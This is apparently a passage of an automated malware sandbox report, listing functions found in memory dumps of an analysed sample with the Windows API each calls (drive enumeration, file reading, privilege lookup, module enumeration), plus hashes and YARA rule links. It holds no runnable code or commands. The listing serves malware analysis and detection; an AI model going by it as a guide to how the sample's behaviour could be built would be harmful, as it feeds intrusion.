                                                        • Opcode ID: e486119cf9e8f045ea8457bf247df25a170a61fd0aa33f968dd43c2a2430e327
                                                        • Instruction ID: b8efaf3da5e9692235688cafec62e864e6a4e80ddb85e1b06604111d5b18a46a
                                                        • Opcode Fuzzy Hash: e486119cf9e8f045ea8457bf247df25a170a61fd0aa33f968dd43c2a2430e327
                                                        • Instruction Fuzzy Hash: 3911AF72500704EFEB21CF55DC85FAAFBACEF44320F04856AF945DA142D671E9048BB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0277137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: 97282b87c933aa69b20f212e70c1a75106c197e647b8ab1c21172251d6208c86
                                                        • Instruction ID: ada3745c529db56b8d426a6150792dd0c20d35a74bfa1f288353e97864565a8d
                                                        • Opcode Fuzzy Hash: 97282b87c933aa69b20f212e70c1a75106c197e647b8ab1c21172251d6208c86
                                                        • Instruction Fuzzy Hash: 92219F765087809FEB21CF25DC45B96FFB4EF06220F0884AAED898B562D335A458DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: 368e26f73832bf215efe3cd6fa99e52bcba2b4c10ecb406bdb055d7fb6887684
                                                        • Instruction ID: 234290505bf908dd203288e7f340f3bb1096b9a25a032a25cad6ec65f9d367ec
                                                        • Opcode Fuzzy Hash: 368e26f73832bf215efe3cd6fa99e52bcba2b4c10ecb406bdb055d7fb6887684
                                                        • Instruction Fuzzy Hash: 4B215B7150D7C49FDB12CB25DC55B92BFB8AF03224F0D84DAE888CF693D2659808DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,8F471319,00000000,00000000,00000000,00000000), ref: 01F4B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: 142555048af955644f58dd3eb699e221891d260f73ee3d48dbd6614d81c31446
                                                        • Instruction ID: 3d9745d9539fe001cbcb59a01bae1a8b86c6eec26a3d3d5b67f0be52b4aeb1fb
                                                        • Opcode Fuzzy Hash: 142555048af955644f58dd3eb699e221891d260f73ee3d48dbd6614d81c31446
                                                        • Instruction Fuzzy Hash: B411B172600300EFFB20CF19DC85FA6FBA8EF04221F04846AED09CB242D671E9048BB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 01F4BB2F
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        • String ID:
                                                        • API String ID: 3437242342-0
                                                        • Opcode ID: d1f51fdd0493060cfb430a2b217574dec8894fceb05a8b88bd8bff2cdbe72803
                                                        • Instruction ID: fd672f67c6773edfacc5bca80a0e186ce801208b56f8552d71cb677b80c1576a
                                                        • Opcode Fuzzy Hash: d1f51fdd0493060cfb430a2b217574dec8894fceb05a8b88bd8bff2cdbe72803
                                                        • Instruction Fuzzy Hash: 5321A1765093C09FEB128B25DC55A92BFA4EF07220F0D84DBDD858F263D235A908DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01F4AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: 890d0f4cdb0f44952c66dee3dd82b95f14f67e1c868ff7335a377301767a72e9
                                                        • Instruction ID: bbec5ea542b09fdc052cc5c3be4c5a7ed6aab494cf209ccf67215ff8321cdf20
                                                        • Opcode Fuzzy Hash: 890d0f4cdb0f44952c66dee3dd82b95f14f67e1c868ff7335a377301767a72e9
                                                        • Instruction Fuzzy Hash: 972172716053809FE722CF29DC44B52BFE8EF46214F0884AAED49CB253D275E404CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027710D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: 204127451ab016f0fa131ab02d1667da204c1d2da7e916e63167640a2b725573
                                                        • Instruction ID: 1f1ce6fdee10d8bd81eb488b8b44876b71bf6f8b36d6a5889294cc8c387de899
                                                        • Opcode Fuzzy Hash: 204127451ab016f0fa131ab02d1667da204c1d2da7e916e63167640a2b725573
                                                        • Instruction Fuzzy Hash: E7219D6140D3C49FE7138B258C54A62BFB4EF57620F0980CBD8848F2A3D2295808D7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,8F471319,00000000,00000000,00000000,00000000), ref: 01F4AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: ff4b1e95a253efa47961fab084bd343d3fa4998728f1887cad3f0f5697ee4e85
                                                        • Instruction ID: 03fb8aa9adbc12d2364899c8760e2bbce8adb0ce9357efbd49269cf6ad2f60d3
                                                        • Opcode Fuzzy Hash: ff4b1e95a253efa47961fab084bd343d3fa4998728f1887cad3f0f5697ee4e85
                                                        • Instruction Fuzzy Hash: E111C172500700EFFB21DF59DC85BA6FBA8EF44720F14846AED09CB282D671A904CBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,8F471319,00000000,00000000,00000000,00000000), ref: 027708E5
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 875ced36e75ee56d8c070cad70ae06a05de88ef8853b55279d17214e13e61a28
                                                        • Instruction ID: d2b855d3228582322627de1a6a1bc99f9cf775ef69534e6bd4bd0086d4acf8e8
                                                        • Opcode Fuzzy Hash: 875ced36e75ee56d8c070cad70ae06a05de88ef8853b55279d17214e13e61a28
                                                        • Instruction Fuzzy Hash: 5A11CE72400704EFFB21CF51DC85FA6FBA8EF14720F04856AED499A241C671A904CBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01F4BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 1a47b127e3f2607e3d77becad73d8dd648255c07340a367ff6a269e6e9a25d7a
                                                        • Instruction ID: d27bb7365712061540ac3de6b006115cf8a24a244462f237618e9a99295dc163
                                                        • Opcode Fuzzy Hash: 1a47b127e3f2607e3d77becad73d8dd648255c07340a367ff6a269e6e9a25d7a
                                                        • Instruction Fuzzy Hash: 7C115C72508784AFDB22CF65DC45A52FFF4EF05210F08849AEA898B662D375E418DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027712D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: 4d3447512787ea61bd481a6c6ced852f1aa6bb33475c81dbcd4c5fda3bcd4511
                                                        • Instruction ID: ca4e481c7d2ce0323754cb2662cc4edaf38a3307cac7d075df07f3faa8e55eef
                                                        • Opcode Fuzzy Hash: 4d3447512787ea61bd481a6c6ced852f1aa6bb33475c81dbcd4c5fda3bcd4511
                                                        • Instruction Fuzzy Hash: 6411C1715083849FDB118F25DC45B96FFA4EF06220F0984EFED498B252D335A808CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 01F4A39C
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 12898add617daa5b5194768621e213006ba837cd009bddf65528e97604e3804f
                                                        • Instruction ID: 4fd97bdd3af0f1957a01c6f7a6e53a9e957ffbca07612709c035b55fea398308
                                                        • Opcode Fuzzy Hash: 12898add617daa5b5194768621e213006ba837cd009bddf65528e97604e3804f
                                                        • Instruction Fuzzy Hash: E4114F715093C49FE7128B15DC54AA2BFB4DF47614F0880DBEDC58F253D266A808DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027705E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: 307e3aa15b208af036059c0d86c736c484c1a510e3f1be1326c176c32b4693d6
                                                        • Instruction ID: 88216d05f0385ee0bb8f2edf1d6a76d13be6dbeae0c586bad303668ca0348b9b
                                                        • Opcode Fuzzy Hash: 307e3aa15b208af036059c0d86c736c484c1a510e3f1be1326c176c32b4693d6
                                                        • Instruction Fuzzy Hash: AD1102755093C09FDB128B15DC94B52FFB4DF42224F0880DBEC858B663D274A808CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0277092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 66091ed15d151a4b49ef31c593aafbb9bdf298004d09107da08254fbf47a0b90
                                                        • Instruction ID: 04aa153c8ca7f4c9be82d468325e05cee9692f886377d5129a27a53fd04458a7
                                                        • Opcode Fuzzy Hash: 66091ed15d151a4b49ef31c593aafbb9bdf298004d09107da08254fbf47a0b90
                                                        • Instruction Fuzzy Hash: F31190754097C49FE7128B25DC55B92BFA4EF07324F0980DAD9844B163D265A908CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01F4AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: aea29bb427671ba5f7c6543e7c1812ace0da9ae087e1a717635c924ff2ecd869
                                                        • Instruction ID: 58d5224e062084cd14ad9ca91061e78e3eeb3f0d509c14a8450bf1044c045568
                                                        • Opcode Fuzzy Hash: aea29bb427671ba5f7c6543e7c1812ace0da9ae087e1a717635c924ff2ecd869
                                                        • Instruction Fuzzy Hash: CD115EB6A40740DFEB21DF29DC85B56FFD8EB04625F08C46AED0ACB642D675E404CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01F4AA71
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: 534c103ee48588be1bcfb1be3f19eb89f427cc73ac1cfbfad79b2c712ce8416a
                                                        • Instruction ID: ac2e355475cf7e210d98db299d836242117bec0fdb920544e547a739e0e99146
                                                        • Opcode Fuzzy Hash: 534c103ee48588be1bcfb1be3f19eb89f427cc73ac1cfbfad79b2c712ce8416a
                                                        • Instruction Fuzzy Hash: 1511E37580D7C09FE7128B15DC85B91BFB4EF03224F0980DBDD858F163D269A909D762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027707C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,8F471319,00000000,00000000,00000000,00000000), ref: 02770819
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: 7e37ca65fd5bd8a90bf99fca15cad76298f37d5d3920394ecb838ad75e003649
                                                        • Instruction ID: 30e26a653864d3250e652255abde5c9ade752335c9f1a43cfbecf67f786d71ef
                                                        • Opcode Fuzzy Hash: 7e37ca65fd5bd8a90bf99fca15cad76298f37d5d3920394ecb838ad75e003649
                                                        • Instruction Fuzzy Hash: A3018C75500744EFFB209F15DC86BA6FB98DF44720F1484AAFD099A282D674A904CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027713AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: 832bfb2e317745a316c726a904d8f96e17cbb6a6e71e094dfdeaca6f1b2becc5
                                                        • Instruction ID: 68368496ac75159bf04160cad8c251687108237377938f159b8ff14a67449dd0
                                                        • Opcode Fuzzy Hash: 832bfb2e317745a316c726a904d8f96e17cbb6a6e71e094dfdeaca6f1b2becc5
                                                        • Instruction Fuzzy Hash: F211AD76500700DFEF20CF56DC85B66FBA4EF04620F08C4AAED4A8B652D771E418DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01F4ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: cb5dd82d49418a373782c8c0ed9828f2879ebfefeb2dee734164fa68b41b91e1
                                                        • Instruction ID: ad6c837485d7303133e8a0f00676862ce6156f20a2acb3712e4277a59dc6fd71
                                                        • Opcode Fuzzy Hash: cb5dd82d49418a373782c8c0ed9828f2879ebfefeb2dee734164fa68b41b91e1
                                                        • Instruction Fuzzy Hash: 4A11C2B58097809FEB11CF65DC85B82BFA4EF42224F0980ABDD498F153D275A508CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01F4BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 5b8cb0d322c1a09420335ef41c6fd7a7d90a9ea6bfe2dbaebdd190e1acdba181
                                                        • Instruction ID: d372424c7e4562f85ca93a2e5250e63c8699e65ad7f65295e7921a6d5abb702d
                                                        • Opcode Fuzzy Hash: 5b8cb0d322c1a09420335ef41c6fd7a7d90a9ea6bfe2dbaebdd190e1acdba181
                                                        • Instruction Fuzzy Hash: 2611A172904704DFEB21CF55DC44B52FFE4EF04611F0884AADE898A612D372E414DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0277104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 7a7bb26309f9b5f8c233ebb94f9a7efb67f2d8dd5c403551799681d07d70b132
                                                        • Instruction ID: 687773babe94e79b2f6007f13ec74eeb06b86d422e20e81b729f0e0a9c369897
                                                        • Opcode Fuzzy Hash: 7a7bb26309f9b5f8c233ebb94f9a7efb67f2d8dd5c403551799681d07d70b132
                                                        • Instruction Fuzzy Hash: CE018471900600AFE310DF16DC46B66FBA8FB84B20F14816AED099B741D735F515CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: 089d226b42b3f66bbc6bb7d18ababda0e98c3d57bc93607c34e248a7a707e641
                                                        • Instruction ID: 9cf846b3dcbf6cfe5dc7d3c7ff8d28750e8d3f53b9b2eabf14329172141c9ada
                                                        • Opcode Fuzzy Hash: 089d226b42b3f66bbc6bb7d18ababda0e98c3d57bc93607c34e248a7a707e641
                                                        • Instruction Fuzzy Hash: 5F015A72A00744DFEB10DF6ADC857AAFBA8EB01625F1884AADC09CB642D774E404CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01F4A23E
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        • Opcode ID: e0c984064c00c1d364a541ac6f9df7a0db07db192e45fc93159c6161be4a3648
                                                        • Instruction ID: 7700ace866774bd801216d234d2e20687a72212af54f318a9b9df9191a84ac4d
                                                        • Opcode Fuzzy Hash: e0c984064c00c1d364a541ac6f9df7a0db07db192e45fc93159c6161be4a3648
                                                        • Instruction Fuzzy Hash: 8E018471900600AFE310DF16DC46B66FBA8FB84A20F14816AED089B741D735F515CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027712FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: 3035ffe11522e3230a05c158ac0cd810e90c3df1663d73c447de85df705bb6d7
                                                        • Instruction ID: 29674bd75fc0a66a8b6443ba34762feb96d65229fa99ca5d69a3fc0acc5065bc
                                                        • Opcode Fuzzy Hash: 3035ffe11522e3230a05c158ac0cd810e90c3df1663d73c447de85df705bb6d7
                                                        • Instruction Fuzzy Hash: BC01DF75900340DFEF10CF15DC857A5FBA4EF04620F48C4AADC098BA42D775A404CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 01F4BB2F
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        • String ID:
                                                        • API String ID: 3437242342-0
                                                        • Opcode ID: 414b5336f82bbb75d08bae666cc96486ee212cdf42faffa09608c1669bbb46ab
                                                        • Instruction ID: ad11303183e348966d69b3b218dc88cc87f93255777e84b76eba2b328501b8b3
                                                        • Opcode Fuzzy Hash: 414b5336f82bbb75d08bae666cc96486ee212cdf42faffa09608c1669bbb46ab
                                                        • Instruction Fuzzy Hash: 7601DF76900240DFEB20CF19DC857A5FFA4EF04620F08C4ABDD498B656D676E804CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: 48223db02798ab9469ed7f6e1bc831a6d9778836d83bf5205a54c109dbb2507d
                                                        • Instruction ID: 42bf464c7c85e0c52a77100846481c0f7d96e0926f12d83e683c03a441a1b370
                                                        • Opcode Fuzzy Hash: 48223db02798ab9469ed7f6e1bc831a6d9778836d83bf5205a54c109dbb2507d
                                                        • Instruction Fuzzy Hash: 49018F71900344DFEB10DF15D885B66FB94EF01624F08C4AADC09CF246D774E404CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027704B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: 7b2499f2af4c3d74be2e897fcddad4748c19489a8fc558924f45e0cfe682fe6c
                                                        • Instruction ID: 3ed1c30463bfaed82018211eb1100046b3141fbc086093681138d3c2a946f440
                                                        • Opcode Fuzzy Hash: 7b2499f2af4c3d74be2e897fcddad4748c19489a8fc558924f45e0cfe682fe6c
                                                        • Instruction Fuzzy Hash: 1D016271900600ABE310DF16DC46B26FBA8FB88B20F14815AED085B741D675F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4A8FA, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VerLanguageNameW.KERNELBASE(?,00000E9C,?,?), ref: 01F4A94A
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageName
                                                        • String ID:
                                                        • API String ID: 2060303382-0
                                                        • Opcode ID: 9c6f8fefdbe1181922c1bc9daa1148800731ba1f9f86008808aaa02554c3f448
                                                        • Instruction ID: 43373395a6ec9abbe4c2bea20601d77110cea0a07a2aff764020fd6efd8e989f
                                                        • Opcode Fuzzy Hash: 9c6f8fefdbe1181922c1bc9daa1148800731ba1f9f86008808aaa02554c3f448
                                                        • Instruction Fuzzy Hash: 58018671900600ABE310DF16DC46B26FBB8FB88B20F14815AED085B741D775F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0277060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: 09d17778600e1331393f876c29959df68867f3d84a9bc14e11a5c06d91cc72ca
                                                        • Instruction ID: 2c854014a9cb0e14f74b7f1ee8d533e168cf5bd3faf46e20d535422a328af409
                                                        • Opcode Fuzzy Hash: 09d17778600e1331393f876c29959df68867f3d84a9bc14e11a5c06d91cc72ca
                                                        • Instruction Fuzzy Hash: 5D01FF35600740CFEF208F15D889761FBA4EF41624F08C0AADC0A8B752D774E808DBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01F4ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: 5f33f89a64f0f9ed17f16617e2e16fd22d781e57d555bc8cf69df6e77ed56d66
                                                        • Instruction ID: 41969234a6e8decfd4ec1cc1ac47deae7141e3ddd8d7e70fe9480e9274173cdb
                                                        • Opcode Fuzzy Hash: 5f33f89a64f0f9ed17f16617e2e16fd22d781e57d555bc8cf69df6e77ed56d66
                                                        • Instruction Fuzzy Hash: 6401D131804740CFEB10DF59D885791FF94DF00224F08C4ABDD0A8F202D675A404CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02771116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
